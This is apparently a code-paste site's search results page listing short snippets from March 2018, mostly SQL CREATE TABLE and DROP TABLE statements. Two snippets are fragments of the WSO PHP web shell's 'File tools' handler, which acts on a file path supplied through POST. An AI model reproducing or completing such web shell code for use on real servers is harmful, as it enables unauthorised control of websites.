42.7K results in 796 ms
8 years ago · Mar 07, 2018, 12:16 PM
Add Comments # DROP TABLE IF EXISTS `phinguin_profiles`; CREATE TABLE `phinguin_profiles` ( id INT NOT NULL auto_increment, is_team BOOLEAN
8 years ago · Mar 07, 2018, 12:04 PM
specs, callback) local str = "CREATE TABLE IF NOT EXISTS " str = str .. mysql.Escape(name) local
8 years ago · Mar 07, 2018, 11:46 AM
SET QUOTED_IDENTIFIER ON GO IF NOT EXISTS (SELECT * FROM sys.objects WHERE
8 years ago · Mar 07, 2018, 10:30 AM
Struktur von Tabelle urlaub.einsatz CREATE TABLE IF NOT EXISTS `einsatz` ( `E_ID` int(11) NOT
8 years ago · Mar 07, 2018, 10:20 AM
CREATE EXTERNAL TABLE IF NOT EXISTS stud_like_ext LIKE stud_int LOCATION
8 years ago · Mar 07, 2018, 10:18 AM
create EXTERNAL TABLE IF NOT EXISTS stud_ext (STUD_ID int, DEPT_ID
8 years ago · Mar 07, 2018, 09:52 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · Mar 07, 2018, 09:22 AM
SET FOREIGN_KEY_CHECKS=0; DROP DATABASE IF EXISTS `foto`; CREATE DATABASE `foto` CHARACTER SET
8 years ago · Mar 07, 2018, 09:20 AM
at this URL: * http://opensource.org/licenses/afl-3.0.php * If you did not receive a copy of
8 years ago · Mar 07, 2018, 07:50 AM
this->session->userdata('id'); $this->load->library('session'); $autoload['libraries'] = array('session'); CREATE TABLE IF NOT EXISTS `ci_sessions` (`id` varchar(40) NOT
8 years ago · Mar 07, 2018, 07:48 AM
if the document field exists in the view If oInspector.ActiveExplorer.ActiveItem.Fields.Exists("document") Then If Not oInspector.ActiveExplorer.Selection.Item(1).Record.Document("document") Is Nothing Then
8 years ago · Mar 07, 2018, 07:32 AM
drop table if exists dims; CREATE TABLE dims(teamid int, team
8 years ago · Mar 07, 2018, 07:24 AM
stmt->closeCursor(); return $results; } /** * Check if a table exists in the database. * @return
8 years ago · Mar 07, 2018, 07:18 AM
table `wp_contact_form_7` # DROP TABLE IF EXISTS `wp_contact_form_7`; # # Table structure of table `wp_contact_form_7` # CREATE TABLE `wp_contact_form_7` ( `cf7_unit_id` bigint(20)
8 years ago · Mar 07, 2018, 07:04 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · Mar 07, 2018, 07:02 AM
see if the RecordID table exists and if not, create it. } CreateRecordIDTable; end; procedure
8 years ago · Mar 07, 2018, 06:56 AM
cfset fileExists = 0> <!--- Check if file exists ---> <cfloop query="getDirNew"> <cfset getDirNewCurrentRow
8 years ago · Mar 07, 2018, 06:46 AM
create external table if not exists test.test_uid( uid int) partitioned by (year string, month string, day string, hour string, domain string) stored as orc location '/user/sqoop/resty_by_domain' tblproperties ('orc.compress'='SNAPPY');
8 years ago · Mar 07, 2018, 06:06 AM
see if the RecordID table exists and if not, create it. } CreateRecordIDTable; end; procedure
Total pages: 2134